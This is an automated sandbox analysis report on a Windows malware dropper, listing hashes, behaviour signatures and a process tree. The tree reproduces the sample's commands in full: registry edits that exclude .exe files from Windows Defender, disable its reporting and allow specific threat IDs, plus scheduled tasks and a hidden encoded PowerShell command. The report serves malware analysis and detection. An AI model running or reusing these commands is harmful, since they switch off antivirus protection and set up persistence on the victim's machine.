Overview

overview

10

Static

static

file.exe

windows7-x64

10

file.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    170s
  • max time network
    180s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-11-2022 15:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    file.exe

  • Size

    7.3MB

  • MD5

    d7772af55ad86fd7e0d80b329232d4a0

  • SHA1

    91bd1a0568fe8f276fd60049412672cb349cd73b

  • SHA256

    a30898a315160935891eaf5dc01eac7086e6a72e14dfb9f7be43835261f87290

  • SHA512

    d2f4ec0885da71f43b2758d0b21266b53a30014e8d4775c3181d834ac3fb9f5b8acc6a0f549c52e4f40ecfadd1f5b6b70bdac6364492a68e007b6a4ccdbc2e71

  • SSDEEP

    196608:91OaKOEjiU9l5UOA0yU/MmtNSM3f7LoVf/Ui2g6n:3Oa8Hl5tA0yTmW8Lt8G

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 3 IoCs
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2432
    • C:\Users\Admin\AppData\Local\Temp\7zSE7D4.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2952
      • C:\Users\Admin\AppData\Local\Temp\7zSF244.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks computer location settings
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1308
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2032
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3124
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:3236
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:4512
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2816
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:920
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:1916
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:1648
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gFVrJeWSl" /SC once /ST 06:37:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:4996
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gFVrJeWSl"
                  4⤵
                    PID:1892
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gFVrJeWSl"
                    4⤵
                      PID:4820
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bPisEBnRwoxYOmuHrm" /SC once /ST 16:25:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\qhwDMIz.exe\" mF /site_id 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:4244
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                1⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3976
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  2⤵
                    PID:5056
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                  1⤵
                    PID:4384
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                    1⤵
                      PID:2720
                    • C:\Windows\system32\gpscript.exe
                      gpscript.exe /RefreshSystemParam
                      1⤵
                        PID:1276
                      • C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\qhwDMIz.exe
                        C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\qhwDMIz.exe mF /site_id 525403 /S
                        1⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:4688
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                          2⤵
                            PID:380

                        Network

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Temp\7zSE7D4.tmp\Install.exe
                          Filesize

                          6.3MB

                          MD5

                          74dc860256858b61c0170b9af62c3a83

                          SHA1

                          8d499018f6467a2f7c4f78ea9915e3774f640fbd

                          SHA256

                          330eb0a24c02d4dcee908a2c3274b113427e40d792f2bca729b54a9ea5c48f8a

                          SHA512

                          56cc2aef2db9f3e1140a28cf33bddbb2e5d3fc5ea014b39caac42d703e884477b7f4fd5469fa72221e7ec951d5f9a4af5698ddb79bcb9b460553d9c4b4cbd625

                          Download Submit

                        • C:\Users\Admin\AppData\Local\Temp\7zSE7D4.tmp\Install.exe
                          Filesize

                          6.3MB

                          MD5

                          74dc860256858b61c0170b9af62c3a83

                          SHA1

                          8d499018f6467a2f7c4f78ea9915e3774f640fbd

                          SHA256

                          330eb0a24c02d4dcee908a2c3274b113427e40d792f2bca729b54a9ea5c48f8a

                          SHA512

                          56cc2aef2db9f3e1140a28cf33bddbb2e5d3fc5ea014b39caac42d703e884477b7f4fd5469fa72221e7ec951d5f9a4af5698ddb79bcb9b460553d9c4b4cbd625

                          Download Submit

                        • C:\Users\Admin\AppData\Local\Temp\7zSF244.tmp\Install.exe
                          Filesize

                          6.8MB

                          MD5

                          a37dbf6bceec57a1792cefc8691b4930

                          SHA1

                          97a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063

                          SHA256

                          edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa

                          SHA512

                          b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77

                          Download Submit

                        • C:\Users\Admin\AppData\Local\Temp\7zSF244.tmp\Install.exe
                          Filesize

                          6.8MB

                          MD5

                          a37dbf6bceec57a1792cefc8691b4930

                          SHA1

                          97a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063

                          SHA256

                          edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa

                          SHA512

                          b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77

                          Download Submit

                        • C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\qhwDMIz.exe
                          Filesize

                          6.8MB

                          MD5

                          a37dbf6bceec57a1792cefc8691b4930

                          SHA1

                          97a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063

                          SHA256

                          edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa

                          SHA512

                          b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77

                          Download Submit

                        • C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\qhwDMIz.exe
                          Filesize

                          6.8MB

                          MD5

                          a37dbf6bceec57a1792cefc8691b4930

                          SHA1

                          97a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063

                          SHA256

                          edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa

                          SHA512

                          b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77

                          Download Submit

                        • memory/380-162-0x0000000000000000-mapping.dmp

                          Download

                        • memory/920-144-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1308-135-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1308-138-0x0000000010000000-0x0000000010D2B000-memory.dmp

                          Filesize

                          13.2MB

                          Download

                        • memory/1648-147-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1892-150-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1916-145-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2032-141-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2816-142-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2952-132-0x0000000000000000-mapping.dmp

                          Download

                        • memory/3124-143-0x0000000000000000-mapping.dmp

                          Download

                        • memory/3236-146-0x0000000000000000-mapping.dmp

                          Download

                        • memory/3976-154-0x00007FF99D520000-0x00007FF99DFE1000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/3976-156-0x00007FF99D520000-0x00007FF99DFE1000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/3976-151-0x000001F04A3D0000-0x000001F04A3F2000-memory.dmp

                          Filesize

                          136KB

                          Download

                        • memory/4244-153-0x0000000000000000-mapping.dmp

                          Download

                        • memory/4512-148-0x0000000000000000-mapping.dmp

                          Download

                        • memory/4688-159-0x0000000010000000-0x0000000010D2B000-memory.dmp

                          Filesize

                          13.2MB

                          Download

                        • memory/4820-152-0x0000000000000000-mapping.dmp

                          Download

                        • memory/4996-149-0x0000000000000000-mapping.dmp

                          Download

                        • memory/5056-155-0x0000000000000000-mapping.dmp

                          Download